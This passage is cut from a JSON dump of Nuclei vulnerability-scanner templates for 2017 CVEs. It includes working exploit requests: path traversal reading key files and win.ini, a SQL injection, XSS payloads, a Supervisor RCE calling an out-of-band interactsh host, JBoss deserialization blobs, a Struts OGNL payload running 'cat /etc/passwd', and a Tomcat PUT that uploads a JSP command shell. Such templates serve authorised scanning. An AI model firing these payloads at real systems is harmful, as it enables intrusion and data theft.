condition: and\n# digest: 4b0a00483046022100cc1685ff29667003d078f1649e722afd7019dd57bfcb94fd210d4624aebdf5fd022100adcdc269c9a84770a1817b96f2a5513541930282e2cdb048fdf74c9e31f8e4d9:922c64590222798bb761d5b6d8e72950", "hash": "e87349fba5bf71eb7c493e6da712b06f", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fb0" }, "name": "CVE-2017-10974.yaml", "content": "id: CVE-2017-10974\n\ninfo:\n name: Yaws 1.91 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: Yaws 1.91 allows unauthenticated local file inclusion via /%5C../ submitted to port 8080.\n impact: |\n The vulnerability allows an attacker to include local files on the server, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Upgrade to a patched version of Yaws or apply the necessary security patches.\n reference:\n - https://www.exploit-db.com/exploits/42303\n - https://nvd.nist.gov/vuln/detail/CVE-2017-10974\n - http://hyp3rlinx.altervista.org/advisories/YAWS-WEB-SERVER-v1.91-UNAUTHENTICATED-REMOTE-FILE-DISCLOSURE.txt\n - https://www.exploit-db.com/exploits/42303/\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2017-10974\n cwe-id: CWE-22\n epss-score: 0.96161\n epss-percentile: 0.9947\n cpe: cpe:2.3:a:yaws:yaws:1.91:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: yaws\n product: yaws\n tags: cve,cve2017,edb,yaws,lfi\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/%5C../ssl/yaws-key.pem\"\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - '!contains(tolower(body), \"\"\n - \"config id=\\\"config\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/xml\"\n\n - type: status\n status:\n - 200\n# digest: 
4a0a00473045022006d394921b0d5a7e04a3fd4c15837d306fae435cd168294f0200ce3c8b85c3de022100a28cc857dd6bb3e3b7914deddd731f3d7a9a721dd521879f221cff5c81597e3f:922c64590222798bb761d5b6d8e72950", "hash": "6497685d1ec974086cc40eacd8d44616", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fb2" }, "name": "CVE-2017-11444.yaml", "content": "id: CVE-2017-11444\n\ninfo:\n name: Subrion CMS <4.1.5.10 - SQL Injection\n author: dwisiswant0\n severity: critical\n description: \"Subrion CMS before 4.1.5.10 has a SQL injection vulnerability in /front/search.php via the $_GET array.\"\n impact: |\n Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.\n remediation: |\n Upgrade Subrion CMS to version 4.1.5.10 or later to mitigate this vulnerability.\n reference:\n - https://github.com/intelliants/subrion/issues/479\n - https://mp.weixin.qq.com/s/89mCnjUCvmptLsKaeVlC9Q\n - https://nvd.nist.gov/vuln/detail/CVE-2017-11444\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2017-11444\n cwe-id: CWE-89\n epss-score: 0.018\n epss-percentile: 0.86776\n cpe: cpe:2.3:a:intelliants:subrion_cms:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: intelliants\n product: subrion_cms\n tags: cve2017,cve,sqli,subrion,intelliants\n\nvariables:\n string: \"{{to_lower(rand_base(5))}}\"\n hex_string: \"{{hex_encode(string)}}\"\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%27{{hex_string}}%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '{{string}}'\n\n - type: status\n status:\n - 200\n# digest: 
490a00463044022054097ca889716ee0d3ffd26eccb31e1090cc41ee675729b96e5ec67138f7634c022043939c20b2460e4071b9a01a8d590cef58a83e2c49c0f73b1f517d3434666c0f:922c64590222798bb761d5b6d8e72950", "hash": "cb39169a07b75e0f488a47d9dbf92cba", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fb3" }, "name": "CVE-2017-11512.yaml", "content": "id: CVE-2017-11512\n\ninfo:\n name: ManageEngine ServiceDesk 9.3.9328 - Arbitrary File Retrieval\n author: 0x_Akoko\n severity: high\n description: |\n ManageEngine ServiceDesk 9.3.9328 is vulnerable to an arbitrary file retrieval due to improper restrictions of the pathname used in the name parameter for the download-snapshot path. An unauthenticated remote attacker can use this vulnerability to download arbitrary files.\n impact: |\n An attacker can access sensitive files on the server, potentially leading to unauthorized access or data leakage.\n remediation: |\n Upgrade to a patched version of ManageEngine ServiceDesk 9.3.9328 or apply the necessary security patches.\n reference:\n - https://exploit.kitploit.com/2017/11/manageengine-servicedesk-cve-2017-11512.html\n - https://www.tenable.com/security/research/tra-2017-31\n - https://nvd.nist.gov/vuln/detail/CVE-2017-11512\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2017-11512\n cwe-id: CWE-22\n epss-score: 0.97175\n epss-percentile: 0.99794\n cpe: cpe:2.3:a:manageengine:servicedesk:9.3.9328:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: manageengine\n product: servicedesk\n shodan-query: http.title:\"ManageEngine\"\n tags: cve,cve2017,manageengine,lfr,unauth,tenable\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/fosagent/repl/download-file?basedir=4&filepath=..\\..\\Windows\\win.ini'\n - 
'{{BaseURL}}/fosagent/repl/download-snapshot?name=..\\..\\..\\..\\..\\..\\..\\Windows\\win.ini'\n\n stop-at-first-match: true\n matchers:\n - type: word\n part: body\n words:\n - \"bit app support\"\n - \"fonts\"\n - \"extensions\"\n condition: and\n# digest: 4a0a00473045022075475b13b0c988c21ece3fd5009fa0ed01ba7fef5c7daffb6579403d0bfdc831022100809a276461fd74d794533eaf19a7d5155c61d32b746d12ac53a958ef2f4dbaf6:922c64590222798bb761d5b6d8e72950", "hash": "f2f89b5ef1c86e5cdb9f34e8c06dd945", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fb4" }, "name": "CVE-2017-11586.yaml", "content": "id: CVE-2017-11586\n\ninfo:\n name: FineCMS <5.0.9 - Open Redirect\n author: 0x_Akoko\n severity: medium\n description: |\n FineCMS 5.0.9 contains an open redirect vulnerability via the url parameter in a sync action. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks.\n remediation: |\n Upgrade to FineCMS version 5.0.9 or later to fix the open redirect vulnerability.\n reference:\n - http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#URL-Redirector-Abuse\n - https://nvd.nist.gov/vuln/detail/CVE-2017-11586\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-11586\n cwe-id: CWE-601\n epss-score: 0.00121\n epss-percentile: 0.46136\n cpe: cpe:2.3:a:finecms:finecms:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: finecms\n product: finecms\n tags: cve,cve2017,redirect,finecms\n\nhttp:\n - raw:\n - |\n POST /index.php?s=member&c=login&m=index HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n 
back=&data%5Busername%5D={{username}}&data%5Bpassword%5D={{password}}&data%5Bauto%5D=1\n - |\n GET /index.php?c=weixin&m=sync&url=http://interact.sh HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: regex\n part: header\n regex:\n - 'Refresh:(.*)url=http:\\/\\/interact\\.sh'\n# digest: 4b0a00483046022100b9dd6b07bd9874ead239ed591f16da9a600ac73cdc8404ed8e9bcc90e3918104022100bbe20d6aa691239c1573bbf7ccd5993f2127b310bae7ce921c22cc05c615efdd:922c64590222798bb761d5b6d8e72950", "hash": "ffd7d6f739cb40fee0d40d071e940372", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fb5" }, "name": "CVE-2017-11610.yaml", "content": "id: CVE-2017-11610\n\ninfo:\n name: XML-RPC Server - Remote Code Execution\n author: notnotnotveg\n severity: high\n description: The XML-RPC server in supervisor before 3.0.1, 3.1.x before 3.1.4, 3.2.x before 3.2.4, and 3.3.x before 3.3.3 allows remote authenticated users to execute arbitrary commands via a crafted XML-RPC request, related to nested supervisor namespace lookups.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.\n remediation: |\n Apply the latest security patches or disable the XML-RPC server if not required.\n reference:\n - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/supervisor_xmlrpc_exec.md\n - https://nvd.nist.gov/vuln/detail/CVE-2017-11610\n - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXGWOJNSWWK2TTWQJZJUP66FLFIWDMBQ/\n - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DTPDZV4ZRICDYAYZVUHSYZAYDLRMG2IM/\n - http://www.debian.org/security/2017/dsa-3942\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2017-11610\n cwe-id: CWE-276\n epss-score: 0.97449\n epss-percentile: 0.99947\n cpe: 
cpe:2.3:a:supervisord:supervisor:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: supervisord\n product: supervisor\n shodan-query: http.title:\"Supervisor Status\"\n tags: cve2017,cve,oast,xmlrpc,msf,rce,supervisor,supervisord\n\nhttp:\n - raw:\n - |\n POST /RPC2 HTTP/1.1\n Host: {{Hostname}}\n Accept: text/xml\n Content-type: text/xml\n\n \n supervisor.supervisord.options.warnings.linecache.os.system\n \n \n nslookup {{interactsh-url}}\n \n \n \n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"dns\"\n\n - type: word\n part: header\n words:\n - \"text/xml\"\n\n - type: word\n part: body\n words:\n - \"\"\n - \"\"\n condition: and\n# digest: 490a0046304402201ad8588b21856c3e2e3cd9b2005efb3ab532688a03f56bfe6b6d4700adcfeb24022034a9d062ba9d9e21715b31256d921ca212e61f2266208cc6aac596dd63b3d22f:922c64590222798bb761d5b6d8e72950", "hash": "05cfd680466b9fe19409ab93d63aaaa0", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fb6" }, "name": "CVE-2017-11629.yaml", "content": "id: CVE-2017-11629\n\ninfo:\n name: FineCMS <=5.0.10 - Cross-Site Scripting\n author: ritikchaddha\n severity: medium\n description: |\n FineCMS through 5.0.10 contains a cross-site scripting vulnerability in controllers/api.php via the function parameter in a c=api&m=data2 request.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to the latest version of FineCMS (>=5.0.11) which includes a fix for this vulnerability.\n reference:\n - http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#URL-Redirector-Abuse\n - http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#api-php-Reflected-XSS\n - https://nvd.nist.gov/vuln/detail/CVE-2017-11629/\n - 
https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-11629\n cwe-id: CWE-79\n epss-score: 0.001\n epss-percentile: 0.40119\n cpe: cpe:2.3:a:finecms:finecms:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: finecms\n product: finecms\n tags: cve,cve2017,xss,finecms\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?c=api&m=data2&function=%3Cscript%3Ealert(document.domain)%3C/script%3Ep&format=php\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'p不存在'\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100d01d92bbe3a4ba9ea85de6f3a033ae4aa2b93a18bd1629682789b01668ec35140221008619ec2e6de780f1c714003d002cb9e11f38bbb4b01264975b377553dface393:922c64590222798bb761d5b6d8e72950", "hash": "a54d3f386478bd9924ab126d62a446fb", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fb7" }, "name": "CVE-2017-12138.yaml", "content": "id: CVE-2017-12138\n\ninfo:\n name: XOOPS Core 2.5.8 - Open Redirect\n author: 0x_Akoko\n severity: medium\n description: XOOPS Core 2.5.8 contains an open redirect vulnerability in /modules/profile/index.php due to the URL filter. 
An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware.\n remediation: |\n Apply the latest security patch or upgrade to a newer version of XOOPS Core to fix the open redirect vulnerability.\n reference:\n - https://github.com/XOOPS/XoopsCore25/issues/523\n - https://xoops.org\n - https://nvd.nist.gov/vuln/detail/CVE-2017-12138\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-12138\n cwe-id: CWE-601\n epss-score: 0.00062\n epss-percentile: 0.24419\n cpe: cpe:2.3:a:xoops:xoops:2.5.8:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: xoops\n product: xoops\n tags: cve,cve2017,redirect,xoops,authenticated\n\nhttp:\n - raw:\n - |\n POST /user.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n uname={{username}}&pass={{password}}&xoops_redirect=%2Findex.php&op=login\n - |\n GET /modules/profile/index.php?op=main&xoops_redirect=https:www.interact.sh HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$' # https://regex101.com/r/L403F0/1\n# digest: 4a0a0047304502210086fe37ec367180de3965e272e7b960209ab80611b4c55bcd92d3b1cfda6074100220136441eb75bb6eeecb92bf19aa6776daade6154861d0ce3e94bbabdd66679817:922c64590222798bb761d5b6d8e72950", "hash": "2ede9ad9c29807334dd082635ce82468", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fb8" }, "name": "CVE-2017-12149.yaml", "content": "id: CVE-2017-12149\n\ninfo:\n name: Jboss Application Server 
- Remote Code Execution\n author: fopina,s0obi\n severity: critical\n description: Jboss Application Server as shipped with Red Hat Enterprise Application Platform 5.2 is susceptible to a remote code execution vulnerability because the doFilter method in the ReadOnlyAccessFilter of the HTTP Invoker does not restrict classes for which it performs deserialization, thus allowing an attacker to execute arbitrary code via crafted serialized data.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized remote code execution on the affected server.\n remediation: |\n Apply the latest security patches and updates provided by Jboss to fix this vulnerability.\n reference:\n - https://chowdera.com/2020/12/20201229190934023w.html\n - https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149\n - https://nvd.nist.gov/vuln/detail/CVE-2017-12149\n - https://bugzilla.redhat.com/show_bug.cgi?id=1486220\n - https://access.redhat.com/errata/RHSA-2018:1607\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2017-12149\n cwe-id: CWE-502\n epss-score: 0.9719\n epss-percentile: 0.99802\n cpe: cpe:2.3:a:redhat:jboss_enterprise_application_platform:5.0.0:*:*:*:*:*:*:*\n metadata:\n max-request: 3\n vendor: redhat\n product: jboss_enterprise_application_platform\n tags: cve2017,cve,java,rce,deserialization,kev,vulhub,jboss,intrusive,redhat\n\nhttp:\n - raw:\n - |\n POST /invoker/JMXInvokerServlet/ HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/octet-stream\n\n {{ base64_decode(\"rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==\") }}\n - |\n POST /invoker/EJBInvokerServlet/ HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/octet-stream\n\n {{ base64_decode(\"rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==\") }}\n - |\n POST /invoker/readonly HTTP/1.1\n 
Host: {{Hostname}}\n Content-Type: application/octet-stream\n\n {{ base64_decode(\"rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==\") }}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ClassCastException\n\n - type: status\n status:\n - 200\n - 500\n# digest: 4b0a00483046022100ff07339440ed832558350d4e1909be660a2e00b68ca5777281e9e43e25195d8c022100f8797a6125eb10137f47322fda28c9b9075841e230dd91cacc849802e719af59:922c64590222798bb761d5b6d8e72950", "hash": "8d8cd8bec2584ba8982f71c6f5ba321e", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fb9" }, "name": "CVE-2017-12542.yaml", "content": "id: CVE-2017-12542\n\ninfo:\n name: HPE Integrated Lights-out 4 (ILO4) <2.53 - Authentication Bypass\n author: pikpikcu\n severity: critical\n description: HPE Integrated Lights-out 4 (iLO 4) prior to 2.53 was found to contain an authentication bypass and code execution vulnerability.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the affected system.\n remediation: |\n Upgrade HPE Integrated Lights-out 4 (ILO4) to version 2.53 or later to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/44005\n - https://nvd.nist.gov/vuln/detail/CVE-2017-12542\n - https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03769en_us\n - https://www.exploit-db.com/exploits/44005/\n - http://www.securitytracker.com/id/1039222\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 10\n cve-id: CVE-2017-12542\n epss-score: 0.97224\n epss-percentile: 0.99822\n cpe: cpe:2.3:o:hp:integrated_lights-out_4_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: hp\n product: integrated_lights-out_4_firmware\n tags: cve,cve2017,ilo4,hpe,auth-bypass,edb,hp\n\nhttp:\n - method: GET\n path:\n - 
\"{{BaseURL}}/rest/v1/AccountService/Accounts\"\n\n headers:\n Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"iLO User\"\n\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502206f44ac0f4d283c3274421cf7602fe089c97a4031c30a643c870eccb4114bf13e022100929a4cbef7545c9c9dadba9a770a841a2587fad0d188ebffff79a171fcb9cc3b:922c64590222798bb761d5b6d8e72950", "hash": "4ce8e3a8347e0fd55b5e871cb2dfe8f0", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fba" }, "name": "CVE-2017-12544.yaml", "content": "id: CVE-2017-12544\n\ninfo:\n name: HPE System Management - Cross-Site Scripting\n author: divya_mudgal\n severity: medium\n description: HPE System Management contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. 
This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected user's browser.\n remediation: |\n Apply the latest security patches or updates provided by HPE to fix the XSS vulnerability in the System Management software.\n reference:\n - https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbmu03753en_us\n - http://web.archive.org/web/20211206092413/https://securitytracker.com/id/1039437\n - https://nvd.nist.gov/vuln/detail/CVE-2017-12544\n - http://www.securitytracker.com/id/1039437\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2017-12544\n cwe-id: CWE-79\n epss-score: 0.96723\n epss-percentile: 0.99637\n cpe: cpe:2.3:a:hp:system_management_homepage:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: hp\n product: system_management_homepage\n tags: cve,cve2017,xss,hp\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/gsearch.php.en?prod=';prompt`document.domain`;//\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"var prodName = '';prompt`document.domain`;//';\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100d6096a44064ff11a98cb2a3b0e4ea152b4e05f54485d6eb402c890697a0d3a7902205eda1523b2432502e783dad4db1ca29da4c467564da34d58541f827c4653f9ae:922c64590222798bb761d5b6d8e72950", "hash": "09dc5af063df8241e029138846e693ad", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fbb" }, "name": "CVE-2017-12583.yaml", "content": "id: CVE-2017-12583\n\ninfo:\n name: DokuWiki - Cross-Site Scripting\n author: DhiyaneshDK\n severity: medium\n description: DokuWiki through 2017-02-19b contains a cross-site scripting 
vulnerability in the DATE_AT parameter to doku.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to the latest version of DokuWiki or apply the provided patch to fix the XSS vulnerability.\n reference:\n - https://github.com/splitbrain/dokuwiki/issues/2061\n - https://nvd.nist.gov/vuln/detail/CVE-2017-12583\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-12583\n cwe-id: CWE-79\n epss-score: 0.00117\n epss-percentile: 0.44712\n cpe: cpe:2.3:a:dokuwiki:dokuwiki:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: dokuwiki\n product: dokuwiki\n shodan-query: http.title:\"DokuWiki\"\n tags: cve,cve2017,xss,dokuwiki\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/dokuwiki/doku.php?id=wiki:welcome&at='\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'Unable to parse at parameter \"\".'\n\n - type: word\n part: header\n words:\n - 'text/html'\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022040428c7102aee34ec9392abb1a5987369b001372f29a97e6592a24621b4deee302206d6c2d35e3f7dcf178bac29764bc37dc1b7b92218a5ca66ca4c21d133e32a5a5:922c64590222798bb761d5b6d8e72950", "hash": "3538ac2fd684407bb33fcd3d19e92506", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fbc" }, "name": "CVE-2017-12611.yaml", "content": "id: CVE-2017-12611\n\ninfo:\n name: Apache Struts2 S2-053 - Remote Code Execution\n author: pikpikcu\n severity: critical\n 
description: Apache Struts 2.0.0 through 2.3.33 and 2.5 through 2.5.10.1 uses an unintentional expression in a Freemarker tag instead of string literals, which makes it susceptible to remote code execution attacks.\n impact: |\n Remote code execution\n remediation: |\n Apply the latest security patches or upgrade to a non-vulnerable version of Apache Struts2.\n reference:\n - https://struts.apache.org/docs/s2-053.html\n - https://nvd.nist.gov/vuln/detail/CVE-2017-12611\n - https://kb.netapp.com/support/s/article/ka51A000000CgttQAC/NTAP-20170911-0001\n - http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2017-003.txt\n - http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2017-12611\n cwe-id: CWE-20\n epss-score: 0.97358\n epss-percentile: 0.99886\n cpe: cpe:2.3:a:apache:struts:2.0.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: apache\n product: struts\n tags: cve,cve2017,apache,rce,struts\n\nhttp:\n - method: POST\n path:\n - 
\"{{BaseURL}}/?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402205a7e846889ca9fef021f58b756f7db9e533f0fd2b079699079c49a442f3a817302200cac7efeb08c7927aba913cf747c76517a5bc78708c560f54c0cc97f9bad6598:922c64590222798bb761d5b6d8e72950", "hash": "7e5cfe92798dd473f4f01b2203de6d94", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fbd" }, "name": "CVE-2017-12615.yaml", "content": "id: CVE-2017-12615\n\ninfo:\n name: Apache Tomcat Servers - Remote Code Execution\n author: pikpikcu\n severity: high\n description: |\n Apache Tomcat servers 7.0.{0 to 79} are susceptible to remote code execution. By design, you are not allowed to upload JSP files via the PUT method. This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server. 
However, due to the insufficient checks, an attacker could gain remote code execution on Apache Tomcat servers that have enabled PUT method by using a specially crafted HTTP request.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the affected server.\n remediation: |\n Apply the latest security patches or upgrade to a non-vulnerable version of Apache Tomcat.\n reference:\n - https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615\n - https://lists.apache.org/thread.html/8fcb1e2d5895413abcf266f011b9918ae03e0b7daceb118ffbf23f8c@%3Cannounce.tomcat.apache.org%3E\n - http://web.archive.org/web/20211206035549/https://securitytracker.com/id/1039392\n - https://nvd.nist.gov/vuln/detail/CVE-2017-12615\n - http://breaktoprotect.blogspot.com/2017/09/the-case-of-cve-2017-12615-tomcat-7-put.html\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.1\n cve-id: CVE-2017-12615\n cwe-id: CWE-434\n epss-score: 0.96878\n epss-percentile: 0.99684\n cpe: cpe:2.3:a:apache:tomcat:7.0:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: apache\n product: tomcat\n shodan-query: title:\"Apache Tomcat\"\n tags: cve2017,cve,rce,tomcat,kev,vulhub,apache,fileupload,intrusive\n\nhttp:\n - method: PUT\n path:\n - \"{{BaseURL}}/poc.jsp/\"\n\n body: |\n <%@ page import=\"java.util.*,java.io.*\"%>\n <%\n if (request.getParameter(\"cmd\") != null) {\n out.println(\"Command: \" + request.getParameter(\"cmd\") + \"
